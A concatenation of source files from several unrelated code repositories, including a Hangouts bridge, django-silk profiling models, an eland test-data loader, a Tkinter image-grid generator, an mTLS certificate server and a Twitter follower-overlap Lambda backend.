r2 = ((vout)*(r1))/(vin-vout)
return r2
vin = int(raw_input('vin: '))
vout = int(raw_input('vout: '))
r1 = int(raw_input('r1: '))
print divider(vin, vout, r1)
``` |
{
"source": "joshdabosh/dhbridge",
"score": 3
} |
#### File: bridge/nacre/hangouts.py
```python
import hangups
class Hangouts:
def __init__(self, client):
self.client = client
async def start(self):
self.users, self.conversations = await hangups.build_user_conversation_list(self.client)
async def send(self, message, conversation, annotate=True, raw=False):
if annotate:
annotationType = 4
else:
annotationType = 0
if raw:
segments = [hangups.ChatMessageSegment(message)]
else:
segments = hangups.ChatMessageSegment.from_str(message)
request = hangups.hangouts_pb2.SendChatMessageRequest(
request_header=self.client.get_request_header(),
event_request_header=conversation._get_event_request_header(),
message_content=hangups.hangouts_pb2.MessageContent(
segment=[segment.serialize() for segment in segments]
),
annotation=[hangups.hangouts_pb2.EventAnnotation(
type=annotationType
)]
)
await self.client.send_chat_message(request)
def getConversation(self, cid=None, event=None):
if event:
cid = event.conversation_id.id
return self.conversations.get(cid)
def getUser(self, uid=None, event=None):
if event:
uid = event.sender_id.gaia_id
return self.users.get_user(hangups.user.UserID(uid, uid))
async def getContact(self, username=None):
userConvoList = await hangups.build_user_conversation_list(self.client) # Basically this lets you get a list of everyone in all your chats
userList, convoList = userConvoList # This is just extracting data
userList = userList.get_all() # Same as above
matches = [] # Now we start looping through data
for user in userList:
if username in (user.full_name).lower():
matches.append(user)
return matches
async def getConvList(self):
return self.conversations.get_all()
async def getGroupChats(self):
return [c for c in await self.getConvList() if len(c.users) > 2]
def getConversation(self, cid=None, event=None):
if event:
cid = event.conversation_id.id
return self.conversations.get(cid)
``` |
{
"source": "JoshData/crs-reports-website",
"score": 3
} |
#### File: JoshData/crs-reports-website/history_histogram.py
```python
import datetime
import json
import glob
# helper function to parse report dates
import pytz
us_eastern_tz = pytz.timezone('America/New_York')
def parse_dt(s):
dt = datetime.datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")
return us_eastern_tz.localize(dt)
# Get the first and last version date of each report.
reports = []
for fn in glob.glob("reports/reports/*.json"):
with open(fn) as f:
r = json.load(f)
d1 = parse_dt(r["versions"][0]["date"])
d2 = parse_dt(r["versions"][-1]["date"])
reports.append((r["id"], d1, d2))
# Sort and output the longest duration reports.
reports.sort(key = lambda r : r[2]-r[1])
for r, d1, d2 in reports[0:10]:
print(r, (d1-d2).days/365.25, "years", d2.isoformat(), d1.isoformat())
# Output a histogram of difference from first to last date.
factor = 365.25
from collections import defaultdict
histogram = defaultdict(lambda : 0)
for r, d1, d2 in reports:
delta_days = (d1-d2).total_seconds() / (60*60*24)
bin = int(delta_days/factor)
histogram[bin] += 1
hist_max = max(histogram.values())
for delta_days, count in sorted(histogram.items()):
print(str(delta_days).rjust(2), "#"*round(50*count/hist_max))
``` |
{
"source": "JoshData/silk",
"score": 2
} |
#### File: silk/silk/collector.py
```python
from threading import local
import cProfile, pstats, StringIO
from six import with_metaclass
from silk import models
from silk.config import SilkyConfig
from silk.errors import SilkNotConfigured, SilkInternalInconsistency
from silk.models import _time_taken
from silk.singleton import Singleton
TYP_SILK_QUERIES = 'silk_queries'
TYP_PROFILES = 'profiles'
TYP_QUERIES = 'queries'
class DataCollector(with_metaclass(Singleton, object)):
"""
Provides the ability to save all models at the end of the request. We cannot save during
the request due to the possibility of atomic blocks and hence must collect data and perform
the save at the end.
"""
def __init__(self):
super(DataCollector, self).__init__()
self.local = local()
self._configure()
@property
def request(self):
return getattr(self.local, 'request', None)
def get_identifier(self):
self.local.temp_identifier += 1
return self.local.temp_identifier
@request.setter
def request(self, value):
self.local.request = value
def _configure(self):
self.local.objects = {}
self.local.temp_identifier = 0
@property
def objects(self):
return getattr(self.local, 'objects', None)
@property
def queries(self):
return self._get_objects(TYP_QUERIES)
@property
def silk_queries(self):
return self._get_objects(TYP_SILK_QUERIES)
def _get_objects(self, typ):
objects = self.objects
if objects is None:
self._raise_not_configured('Attempt to access %s without initialisation.' % typ)
if not typ in objects:
objects[typ] = {}
return objects[typ]
@property
def profiles(self):
return self._get_objects(TYP_PROFILES)
@property
def silk_queries(self):
return self._get_objects('silk_queries')
def configure(self, request=None):
self.request = request
self._configure()
if SilkyConfig().SILKY_PYTHON_PROFILER:
self.pythonprofiler = cProfile.Profile()
self.pythonprofiler.enable()
def clear(self):
self.request = None
self._configure()
def _raise_not_configured(self, err):
raise SilkNotConfigured(err + ' Is the middleware installed correctly?')
def register_objects(self, typ, *args):
for arg in args:
ident = self.get_identifier()
objects = self.objects
if objects is None:
# This can happen if the SilkyMiddleware.process_request is not called for whatever reason.
# Perhaps if another piece of middleware is not playing ball.
self._raise_not_configured('Attempt to register object of type %s without initialisation. ')
if not typ in objects:
self.objects[typ] = {}
self.objects[typ][ident] = arg
def register_query(self, *args):
self.register_objects(TYP_QUERIES, *args)
def register_profile(self, *args):
self.register_objects(TYP_PROFILES, *args)
def _record_meta_profiling(self):
if SilkyConfig().SILKY_META:
num_queries = len(self.silk_queries)
query_time = sum(_time_taken(x['start_time'], x['end_time']) for _, x in self.silk_queries.items())
self.request.meta_num_queries = num_queries
self.request.meta_time_spent_queries = query_time
self.request.save()
def stop_python_profiler(self):
if hasattr(self, 'pythonprofiler'):
self.pythonprofiler.disable()
def finalise(self):
if hasattr(self, 'pythonprofiler'):
s = StringIO.StringIO()
ps = pstats.Stats(self.pythonprofiler, stream=s).sort_stats('cumulative')
ps.print_stats()
profile_text = s.getvalue()
profile_text = "\n".join(profile_text.split("\n")[0:256]) # don't record too much because it can overflow the field storage size
self.request.pyprofile = profile_text
for _, query in self.queries.items():
query_model = models.SQLQuery.objects.create(**query)
query['model'] = query_model
for _, profile in self.profiles.items():
profile_query_models = []
if TYP_QUERIES in profile:
profile_queries = profile[TYP_QUERIES]
del profile[TYP_QUERIES]
for query_temp_id in profile_queries:
try:
query = self.queries[query_temp_id]
try:
profile_query_models.append(query['model'])
except KeyError:
raise SilkInternalInconsistency('Profile references a query dictionary that has not '
'been converted into a Django model. This should '
'never happen, please file a bug report')
except KeyError:
raise SilkInternalInconsistency('Profile references a query temp_id that does not exist. '
'This should never happen, please file a bug report')
profile = models.Profile.objects.create(**profile)
if profile_query_models:
profile.queries = profile_query_models
profile.save()
self._record_meta_profiling()
def register_silk_query(self, *args):
self.register_objects(TYP_SILK_QUERIES, *args)
```
#### File: silk/silk/models.py
```python
from collections import Counter
import json
from django.db import models
from django.db.models import DateTimeField, TextField, CharField, ForeignKey, IntegerField, BooleanField, F, \
ManyToManyField, OneToOneField, FloatField
from django.utils import timezone
from django.db import transaction
import sqlparse
# Seperated out so can use in tests w/o models
def _time_taken(start_time, end_time):
d = end_time - start_time
return d.seconds * 1000 + d.microseconds / 1000
def time_taken(self):
return _time_taken(self.start_time, self.end_time)
class CaseInsensitiveDictionary(dict):
def __getitem__(self, key):
return super(CaseInsensitiveDictionary, self).__getitem__(key.lower())
def __setitem__(self, key, value):
super(CaseInsensitiveDictionary, self).__setitem__(key.lower(), value)
def update(self, other=None, **kwargs):
for k, v in other.items():
self[k] = v
for k, v in kwargs.items():
self[k] = v
def __init__(self, d):
super(CaseInsensitiveDictionary, self).__init__()
for k, v in d.items():
self[k] = v
class Request(models.Model):
path = CharField(max_length=300, db_index=True)
query_params = TextField(blank=True, default='')
raw_body = TextField(blank=True, default='')
body = TextField(blank=True, default='')
method = CharField(max_length=10)
start_time = DateTimeField(default=timezone.now, db_index=True)
view_name = CharField(max_length=300, db_index=True, blank=True, default='')
end_time = DateTimeField(null=True, blank=True)
time_taken = FloatField(blank=True, null=True)
encoded_headers = TextField(blank=True, default='')
meta_time = FloatField(null=True, blank=True)
meta_num_queries = IntegerField(null=True, blank=True)
meta_time_spent_queries = FloatField(null=True, blank=True)
pyprofile = TextField(blank=True, default='')
@property
def total_meta_time(self):
return (self.meta_time or 0) + (self.meta_time_spent_queries or 0)
# defined in atomic transaction within SQLQuery save()/delete() as well
# as in bulk_create of SQLQueryManager
# TODO: This is probably a bad way to do this, .count() will prob do?
num_sql_queries = IntegerField(default=0)
@property
def time_spent_on_sql_queries(self):
# TODO: Perhaps there is a nicer way to do this with Django aggregates?
# My initial thought was to perform:
# SQLQuery.objects.filter.aggregate(Sum(F('end_time')) - Sum(F('start_time')))
# However this feature isnt available yet, however there has been talk for use of F objects
# within aggregates for four years here: https://code.djangoproject.com/ticket/14030
# It looks like this will go in soon at which point this should be changed.
return sum(x.time_taken for x in SQLQuery.objects.filter(request=self))
@property
def headers(self):
if self.encoded_headers:
raw = json.loads(self.encoded_headers)
else:
raw = {}
return CaseInsensitiveDictionary(raw)
@property
def content_type(self):
return self.headers.get('content-type', None)
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
super(Request, self).save(*args, **kwargs)
class Response(models.Model):
request = OneToOneField('Request', related_name='response', db_index=True)
status_code = IntegerField()
raw_body = TextField(blank=True, default='')
body = TextField(blank=True, default='')
encoded_headers = TextField(blank=True, default='')
@property
def content_type(self):
return self.headers.get('content-type', None)
@property
def headers(self):
if self.encoded_headers:
raw = json.loads(self.encoded_headers)
else:
raw = {}
return CaseInsensitiveDictionary(raw)
class SQLQueryManager(models.Manager):
def bulk_create(self, *args, **kwargs):
"""ensure that num_sql_queries remains consistent. Bulk create does not call
the model save() method and hence we must add this logic here too"""
if len(args):
objs = args[0]
else:
objs = kwargs.get('objs')
with transaction.commit_on_success():
request_counter = Counter([x.request_id for x in objs])
requests = Request.objects.filter(pk__in=request_counter.keys())
# TODO: Not that there is ever more than one request (but there could be eventually)
# but perhaps there is a cleaner way of apply the increment from the counter without iterating
# and saving individually? e.g. bulk update but with diff. increments. Couldn't come up with this
# off hand.
for r in requests:
r.num_sql_queries = F('num_sql_queries') + request_counter[r.pk]
r.save()
save = super(SQLQueryManager, self).bulk_create(*args, **kwargs)
return save
class SQLQuery(models.Model):
query = TextField()
start_time = DateTimeField(null=True, blank=True, default=timezone.now)
end_time = DateTimeField(null=True, blank=True)
time_taken = FloatField(blank=True, null=True)
request = ForeignKey('Request', related_name='queries', null=True, blank=True, db_index=True)
traceback = TextField()
objects = SQLQueryManager()
@property
def traceback_ln_only(self):
return '\n'.join(self.traceback.split('\n')[::2])
@property
def formatted_query(self):
return sqlparse.format(self.query, reindent=True, keyword_case='upper')
# TODO: Surely a better way to handle this? May return false positives
@property
def num_joins(self):
return self.query.lower().count('join ')
@property
def tables_involved(self):
"""A rreally ather rudimentary way to work out tables involved in a query.
TODO: Can probably parse the SQL using sqlparse etc and pull out table info that way?"""
components = [x.strip() for x in self.query.split()]
tables = []
for idx, c in enumerate(components):
# TODO: If django uses aliases on column names they will be falsely identified as tables...
if c.lower() == 'from' or c.lower() == 'join' or c.lower() == 'as':
try:
nxt = components[idx + 1]
if not nxt.startswith('('): # Subquery
stripped = nxt.strip().strip(',')
if stripped:
tables.append(stripped)
except IndexError: # Reach the end
pass
return tables
@transaction.commit_on_success()
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
if not self.pk:
if self.request:
self.request.num_sql_queries += 1
self.request.save()
super(SQLQuery, self).save(*args, **kwargs)
@transaction.commit_on_success()
def delete(self, *args, **kwargs):
self.request.num_sql_queries -= 1
self.request.save()
super(SQLQuery, self).delete(*args, **kwargs)
class BaseProfile(models.Model):
name = CharField(max_length=300, blank=True, default='')
start_time = DateTimeField(default=timezone.now)
end_time = DateTimeField(null=True, blank=True)
request = ForeignKey('Request', null=True, blank=True, db_index=True)
time_taken = FloatField(blank=True, null=True)
class Meta:
abstract = True
def save(self, *args, **kwargs):
if self.end_time and self.start_time:
interval = self.end_time - self.start_time
self.time_taken = interval.total_seconds() * 1000
super(BaseProfile, self).save(*args, **kwargs)
class Profile(BaseProfile):
file_path = CharField(max_length=300, blank=True, default='')
line_num = IntegerField(null=True, blank=True)
end_line_num = IntegerField(null=True, blank=True)
func_name = CharField(max_length=300, blank=True, default='')
exception_raised = BooleanField(default=False)
queries = ManyToManyField('SQLQuery', related_name='profiles', db_index=True)
dynamic = BooleanField(default=False)
@property
def is_function_profile(self):
return self.func_name is not None
@property
def is_context_profile(self):
return self.func_name is None
@property
def time_spent_on_sql_queries(self):
time_spent = sum(x.time_taken for x in self.queries.all())
return time_spent
``` |
{
"source": "joshdavies14/apollo",
"score": 3
} |
#### File: apollo/utils/utils.py
```python
from decimal import Decimal, InvalidOperation
from typing import Iterable
from config import CONFIG
def user_is_irc_bot(ctx):
return ctx.author.id == CONFIG.UWCS_DISCORD_BRIDGE_BOT_ID
def get_name_string(message):
# if message.clean_content.startswith("**<"): <-- FOR TESTING
if user_is_irc_bot(message):
return message.clean_content.split(" ")[0][3:-3]
else:
return f"{message.author.mention}"
def is_decimal(num):
try:
Decimal(num)
return True
except (InvalidOperation, TypeError):
return False
def pluralise(l, word, single="", plural="s"):
if len(l) > 1:
return word + plural
else:
return word + single
def filter_out_none(iterable: Iterable):
return [i for i in iterable if i is not None]
``` |
{
"source": "joshdavies89/e-commerce",
"score": 2
} |
#### File: src/products/models.py
```python
from django.db import models
# Create your models here.
class Product(models.Model):
title = models.CharField(max_length=120)
description = models.TextField(blank=True, null=True)
price = models.DecimalField(decimal_places=2, max_digits=20)
active = models.BooleanField(default=True)
#slug
#inventory
def __unicode__(self):
return self.title
``` |
{
"source": "joshdevins/eland",
"score": 2
} |
#### File: eland/tests/setup_tests.py
```python
import pandas as pd
from elasticsearch import helpers
from eland.common import es_version
from tests import (
ECOMMERCE_FILE_NAME,
ECOMMERCE_INDEX_NAME,
ECOMMERCE_MAPPING,
ELASTICSEARCH_HOST,
ES_TEST_CLIENT,
FLIGHTS_FILE_NAME,
FLIGHTS_INDEX_NAME,
FLIGHTS_MAPPING,
FLIGHTS_SMALL_FILE_NAME,
FLIGHTS_SMALL_INDEX_NAME,
TEST_MAPPING1,
TEST_MAPPING1_INDEX_NAME,
TEST_NESTED_USER_GROUP_DOCS,
TEST_NESTED_USER_GROUP_INDEX_NAME,
TEST_NESTED_USER_GROUP_MAPPING,
)
DATA_LIST = [
(FLIGHTS_FILE_NAME, FLIGHTS_INDEX_NAME, FLIGHTS_MAPPING),
(FLIGHTS_SMALL_FILE_NAME, FLIGHTS_SMALL_INDEX_NAME, FLIGHTS_MAPPING),
(ECOMMERCE_FILE_NAME, ECOMMERCE_INDEX_NAME, ECOMMERCE_MAPPING),
]
def _setup_data(es):
# Read json file and index records into Elasticsearch
for data in DATA_LIST:
json_file_name = data[0]
index_name = data[1]
mapping = data[2]
# Delete index
print("Deleting index:", index_name)
es.indices.delete(index=index_name, ignore=[400, 404])
print("Creating index:", index_name)
es.indices.create(index=index_name, body=mapping)
df = pd.read_json(json_file_name, lines=True)
actions = []
n = 0
print("Adding", df.shape[0], "items to index:", index_name)
for index, row in df.iterrows():
values = row.to_dict()
# make timestamp datetime 2018-01-01T12:09:35
# values['timestamp'] = datetime.strptime(values['timestamp'], '%Y-%m-%dT%H:%M:%S')
# Use integer as id field for repeatable results
action = {"_index": index_name, "_source": values, "_id": str(n)}
actions.append(action)
n = n + 1
if n % 10000 == 0:
helpers.bulk(es, actions)
actions = []
helpers.bulk(es, actions)
actions = []
print("Done", index_name)
def _update_max_compilations_limit(es, limit="10000/1m"):
print("Updating script.max_compilations_rate to ", limit)
if es_version(es) < (7, 8):
body = {"transient": {"script.max_compilations_rate": limit}}
else:
body = {
"transient": {
"script.max_compilations_rate": "use-context",
"script.context.field.max_compilations_rate": limit,
}
}
es.cluster.put_settings(body=body)
def _setup_test_mappings(es):
# Create a complex mapping containing many Elasticsearch features
es.indices.delete(index=TEST_MAPPING1_INDEX_NAME, ignore=[400, 404])
es.indices.create(index=TEST_MAPPING1_INDEX_NAME, body=TEST_MAPPING1)
def _setup_test_nested(es):
es.indices.delete(index=TEST_NESTED_USER_GROUP_INDEX_NAME, ignore=[400, 404])
es.indices.create(
index=TEST_NESTED_USER_GROUP_INDEX_NAME, body=TEST_NESTED_USER_GROUP_MAPPING
)
helpers.bulk(es, TEST_NESTED_USER_GROUP_DOCS)
if __name__ == "__main__":
# Create connection to Elasticsearch - use defaults
print("Connecting to ES", ELASTICSEARCH_HOST)
es = ES_TEST_CLIENT
_setup_data(es)
_setup_test_mappings(es)
_setup_test_nested(es)
_update_max_compilations_limit(es)
``` |
{
"source": "joshdickie/image-shuffler",
"score": 4
} |
#### File: joshdickie/image-shuffler/image-shuffler.py
```python
import random, string, os, math
from tkinter import *
from tkinter import ttk, messagebox
from PIL import Image
#window
root = Tk()
root.title("Random Image Grid Generator")
root.resizable(0, 0)
#################################### VARS ####################################
dir_path = os.path.dirname(os.path.realpath(__file__))
text_intro = ("This program takes a number of images of two distinct types, "
"and randomly arranges a selection of them in a grid. Please "
"ensure that the input images are placed in the appropriate "
"folder, are named appropriately, and are the same size.")
text_matrix_number = "Number of matrices:"
text_image_type_a = "Number of images of type a to be selected:"
text_image_type_b = "Number of images of type b to be selected:"
images_a = [] #list of image type a paths
images_b = [] #list of image type b paths
images_total = [] #combined list of paths
padding = 10 #space between images on grid
image_x = 0 #how many pixels wide the images are
image_y = 0 #how many pixels high the images are
matrix_x_pix = 0 #how many pixels wide the matrix is
matrix_y_pix = 0 #how many pixels high the matrix is
matrix_x = 0 #how many images wide the matrix is
matrix_y = 0 #how many images high the matrix is
#Tkinter objects
number_of_matrices = StringVar()
number_of_images_a = StringVar()
number_of_images_b = StringVar()
################################### FUNCTS ###################################
def main():
"""
generates a number (determined by the user) of randomized image
matrices (of size determined by the user), and saves them to
an "output" folder.
"""
global matrix_x, matrix_y
if inputs_valid():
if number_of_images_b.get() != "": #check if images_b empty
matrix_size = (int(number_of_images_a.get()) +
int(number_of_images_b.get()))
else:
matrix_size = int(number_of_images_a.get())
size_prime, matrix_x, matrix_y = square_distribution(matrix_size)
if size_prime:
messagebox.showwarning("Grid can not be constructed", (
"Error: grid of requested size can not be"
"constructed (type a + type b is prime)"))
else:
generate_image_matrices()
messagebox.showinfo("","done.")
def inputs_valid():
"""
checks that all inputs are valid, including:
- user entries
- images
"""
if entries_valid() and number_of_images_valid():
return True
else:
return False
def entries_valid():
"""
verifies that user iput is valid for:
- Matrix size (x and y)
- Number of matrices
"""
if ((number_of_matrices.get()).isdigit() and
(number_of_images_a.get()).isdigit() and
((number_of_images_b.get()).isdigit() or
(number_of_images_b.get() is ""))):
return True
else:
messagebox.showwarning("Invalid entries", (
"All input values must be "
"non-negative integers."))
return False
def number_of_images_valid():
"""
verifies that the number of images in the "type a" input folder is
greater than or equal to number_of_images_a. Does the same for
type b.
"""
if number_of_images_a_valid() and number_of_images_b_valid():
return True
else:
return False
def number_of_images_a_valid():
"""
verifies that the number of images in the "type a" input folder is
greater than or equal to number_of_images_a.
"""
counter = 0
with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
counter += 1
if counter >= int(number_of_images_a.get()):
return True
else:
messagebox.showwarning("Invalid Image Inputs", (
"Not enough images of type a to create "
"requested grid."))
return False
def number_of_images_b_valid():
"""
verifies that the number of images in the "type b" input folder is
greater than or equal to number_of_images_b.
"""
counter = 0
with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
counter += 1
if ((number_of_images_b.get() == "") or
(counter >= int(number_of_images_b.get()))):
return True
else:
messagebox.showwarning("Invalid Image Inputs", (
"Not enough images of type b to create "
"requested grid."))
return False
def square_distribution(size):
"""
Determines the "most square" x and y values which will make a grid of
the specified size.
args:
size - the size of the grid (int)
returns:
size_prime - True if size is prime (bool)
x - the x value of the most square distribution (int)
y - the y value of the most square distribution (int)
"""
x = math.ceil(math.sqrt(size))
while x < size:
if size % x != 0:
x += 1
else:
break
y = size//x
if x == size:
size_prime = True
else:
size_prime = False
return (size_prime, x, y)
def generate_image_matrices():
"""
generates and saves the specified number of matrices, using the
given input data.
"""
for i in range(int(number_of_matrices.get())):
clear_space()
populate_image_lists()
randomly_select_images()
get_image_data()
grid_frame = Image.new("RGB", (matrix_x_pix, matrix_y_pix), "white")
image_index = 0
for j in range(matrix_x):
for k in range(matrix_y):
img = Image.open(images_total[image_index])
grid_frame.paste(img, (padding + (j * (padding + image_x)),
padding + (k * (padding + image_y))))
image_index += 1
save_path = (os.path.join(dir_path, "outputs\\") +
number_of_images_a.get() + "a" +
number_of_images_b.get() + "b_img" + str(i) + ".png")
grid_frame.save(save_path, "PNG")
def clear_space():
"""
clears the workspace for a new run
"""
global images_a, images_b, images_total
images_a = []
images_b = []
images_total = []
def populate_image_lists():
"""
populates images_a and images_b with the appropriate paths.
"""
with os.scandir(os.path.join(dir_path, "inputs", "type_a")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
images_a.append(path.path)
with os.scandir(os.path.join(dir_path, "inputs", "type_b")) as filepaths:
for path in filepaths:
extension = os.path.splitext(path)[1].lower()
if extension == ".png" or extension == ".jpg":
images_b.append(path.path)
def randomly_select_images():
"""
combines images_a and images_b by randomly selecting the images which
will be used to generate the image grid, then shuffling the combined
list.
"""
global images_a, images_b, images_total
images_a = random.sample(images_a, int(number_of_images_a.get()))
if number_of_images_b.get() != "": #check if images_b empty
images_b = random.sample(images_b, int(number_of_images_b.get()))
else:
images_b = []
images_total = images_a + images_b
random.shuffle(images_total)
def get_image_data():
"""
gets relevant image data:
- size (width and height) of images
- size (width and height) of the grid
"""
global image_x, image_y, matrix_x_pix, matrix_y_pix
image_x, image_y = Image.open(images_total[0]).size
matrix_x_pix = (matrix_x*image_x) + ((matrix_x + 1) * padding)
matrix_y_pix = (matrix_y*image_y) + ((matrix_y + 1) * padding)
################################## GUI STUFF #################################
#Widgets
frame_intro = ttk.Frame(root, padding = 5, borderwidth = 2, relief = SUNKEN)
frame_inputs = ttk.Frame(root)
label_intro = ttk.Label(frame_intro, text = text_intro, justify = CENTER, wraplength = 450)
label_matrix_number = ttk.Label(frame_inputs, text = text_matrix_number, justify = RIGHT)
label_image_type_a = ttk.Label(frame_inputs, text = text_image_type_a, justify = RIGHT)
label_image_type_b = ttk.Label(frame_inputs, text = text_image_type_b, justify = RIGHT)
entry_matrix_number = ttk.Entry(frame_inputs, textvariable = number_of_matrices, width = 4)
entry_image_type_a = ttk.Entry(frame_inputs, textvariable = number_of_images_a, width = 4)
entry_image_type_b = ttk.Entry(frame_inputs, textvariable = number_of_images_b, width = 4)
button_go = ttk.Button(frame_inputs, text = "Go", command = main)
#Placement
frame_intro.grid(column = 1, row = 1, sticky = (N, S, E, W))
frame_inputs.grid(column = 1, row = 2, sticky = (N, S, E, W))
label_intro.grid(column = 1, row = 1, columnspan = 4, sticky = (N, S, E, W))
label_matrix_number.grid(column = 1, row = 3, sticky = E)
label_image_type_a.grid(column = 1, row = 4, sticky = E)
label_image_type_b.grid(column = 1, row = 5, sticky = E)
entry_matrix_number.grid(column = 2, row = 3)
entry_image_type_a.grid(column = 2, row = 4)
entry_image_type_b.grid(column = 2, row = 5)
button_go.grid(column = 5, row = 6)
#Main Loop
root.mainloop()
``` |
{
"source": "joshdk/mtls-server",
"score": 3
} |
#### File: joshdk/mtls-server/server.py
```python
from configparser import ConfigParser
import os
import json
from cryptography.hazmat.primitives import serialization
from flask import Flask
from flask import request
from cert_processor import CertProcessor
from cert_processor import CertProcessorKeyNotFoundError
from cert_processor import CertProcessorInvalidSignatureError
from cert_processor import CertProcessorUntrustedSignatureError
from handler import Handler
from logger import logger
from utils import get_config_from_file
__author__ = "<NAME> <<EMAIL>>"
app = None
handler = None
def create_app(config=None):
app = Flask(__name__)
handler = Handler(config)
with open("VERSION", "r") as f:
version = str(f.readline().strip())
# This will generate a CA Certificate and Key if one does not exist
try:
cert = handler.cert_processor.get_ca_cert()
except CertProcessorKeyNotFoundError:
# Auto-gen a new key and cert if one is not presented and this is the
# first call ever made to the handler
key = handler.cert_processor.get_ca_key()
cert = handler.cert_processor.get_ca_cert(key)
@app.route("/", methods=["POST"])
def create_handler():
body = request.get_json()
if body["type"] == "CERTIFICATE":
return handler.create_cert(body)
if body["type"] == "USER":
return handler.add_user(body)
if body["type"] == "ADMIN":
return handler.add_user(body, is_admin=True)
@app.route("/", methods=["DELETE"])
def delete_handler():
body = request.get_json()
if body["type"] == "CERTIFICATE":
return handler.revoke_cert(body)
if body["type"] == "USER":
return handler.remove_user(body)
if body["type"] == "ADMIN":
return handler.remove_user(body, is_admin=True)
@app.route("/ca", methods=["GET"])
def get_ca_cert():
cert = handler.cert_processor.get_ca_cert()
cert = cert.public_bytes(serialization.Encoding.PEM).decode("UTF-8")
return (
json.dumps({"issuer": handler.config.get("ca", "issuer"), "cert": cert}),
200,
)
@app.route("/crl", methods=["GET"])
def get_crl():
crl = handler.cert_processor.get_crl()
return crl.public_bytes(serialization.Encoding.PEM).decode("UTF-8")
@app.route("/version", methods=["GET"])
def get_version():
return json.dumps({"version": version}), 200
return app
if __name__ == "__main__":
config_path = os.getenv("CONFIG_PATH", None)
if config_path:
config = get_config_from_file(config_path)
else:
config = get_config_from_file("config.ini")
app = create_app(config)
app.run(port=config.get("mtls", "port", fallback=4000))
``` |
{
"source": "joshdoman/twitter-legitimacy",
"score": 3
} |
#### File: backend/functions/SecondDegreeTwitter.py
```python
import json
import sys
from FollowersAPI import get_followers_for_id, get_following_for_id
from UserAPI import get_user_info
def get_overlap(users1, users2):
user_ids = set()
for user in users1:
user_ids.add(user['id'])
overlap = list()
for user in users2:
user_id = user['id']
if user_id in user_ids:
overlap.append(user)
return overlap
def get_users_you_follow_that_follow_me(my_id, your_id):
my_followers = get_followers_for_id(my_id)
sys.getsizeof(json.dump(my_followers))
your_following = get_following_for_id(your_id)
return get_overlap(my_followers, your_following)
def get_users_you_follow_that_follow_me_using_handles(my_username, your_username):
users = get_user_info([my_username, your_username])
my_user_id = users['data'][0]['id']
your_user_id = users['data'][1]['id']
return get_users_you_follow_that_follow_me(my_user_id, your_user_id)
def get_users_who_follow_you_and_me(my_username, your_username):
users = get_user_info([my_username, your_username])
my_user_id = users['data'][0]['id']
your_user_id = users['data'][1]['id']
my_followers = get_followers_for_id(my_user_id)
your_followers = get_followers_for_id(your_user_id)
return get_overlap(my_followers, your_followers)
if __name__ == "__main__":
# my_username = "AlanaDLevin"
# your_username = "nishitaARK"
# print("Users that {} follows that follow {}".format(your_username, my_username))
# users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username)
# for user in users:
# print("{} ({})".format(user['name'], user['username']))
# print("")
my_username = "nishitaARK"
your_username = "AlanaDLevin"
print("Users that {} follows that follow {}".format(your_username, my_username))
users = get_users_you_follow_that_follow_me_using_handles(my_username, your_username)
for user in users:
print("{} ({})".format(user['name'], user['username']))
```
#### File: twitter-legitimacy/backend/handler.py
```python
import boto3
import json
import time
import os
from botocore.exceptions import ClientError
from functions.UserAPI import get_user_info
from functions.FollowersAPI import get_followers_for_id, get_following_for_id
# Import DynamoDB
s3 = boto3.client('s3')
# Import Environment Variables
followersBucket = os.environ['FOLLOWERS_BUCKET']
followingBucket = os.environ['FOLLOWING_BUCKET']
cacheDuration = os.environ['CACHE_DURATION']
# -------- Helper Functions --------
def get_overlap(users1, users2):
user_ids = set()
for user in users1:
user_ids.add(user['id'])
overlap = list()
for user in users2:
user_id = user['id']
if user_id in user_ids:
overlap.append(user)
return overlap
# -------- DynamoDB Functions --------
def get_cached_followers(userID):
try:
print(followersBucket)
print(userID)
data = s3.get_object(Bucket=followersBucket, Key=userID)
followers = data.get('Body').read().decode('utf-8')
return json.loads(followers)
except ClientError as e:
print("ClientError: %s" % e)
return None
def get_cached_following(userID):
try:
print(followingBucket)
print(userID)
data = s3.get_object(Bucket=followingBucket, Key=userID)
following = data.get('Body').read().decode('utf-8')
return json.loads(following)
except ClientError as e:
print("ClientError: %s" % e)
return None
def cache_followers(userID, followers):
s3.put_object(
Body=json.dumps(followers),
Bucket=followersBucket,
Key=userID
)
def cache_following(userID, following):
s3.put_object(
Body=json.dumps(following),
Bucket=followingBucket,
Key=userID
)
# -------- Main Function (Start) --------
def followsMyFollowers(event, context):
params = json.loads(event['body'])
source_user = params['source_user']
target_user = params['target_user']
return followsMyFollowersHelper(source_user, target_user)
def followsMyFollowersHelper(source_user, target_user):
try:
print("{} looking up {}".format(source_user, target_user))
# 1. Remove '@' from string (user can input "@handle" or "handle")
source_user = source_user.replace("@","")
target_user = target_user.replace("@","")
# 2. Get user info for the source and target users (id, name, profile_url)
user_info = get_user_info([source_user, target_user])['data']
source_user_info = user_info[0]
target_user_info = user_info[1]
source_id = source_user_info['id']
target_id = target_user_info['id']
# 3. Get followers of source user (look up in cache first)
source_followers = get_cached_followers(source_id)
if source_followers is None:
source_followers = get_followers_for_id(source_id)
cache_followers(source_id, source_followers)
# 4. Get users that target follows (look up in cache first)
target_following = get_cached_following(target_id)
if target_following is None:
target_following = get_following_for_id(target_id)
cache_following(target_id, target_following)
# 5. Get users that target follows that follow source
users = get_overlap(source_followers, target_following)
# 6. Return response
body = {
"source": source_user_info,
"target": target_user_info,
"followers_followed": users,
}
response = {
"statusCode": 200,
"headers": {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": json.dumps(body, indent=4)
}
return response
except Exception as e:
if 'Request returned an error: 429' in e:
response = {
"statusCode": 429,
"headers": {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": "Too Many Requests"
}
return response
else:
response = {
"statusCode": 400,
"headers": {
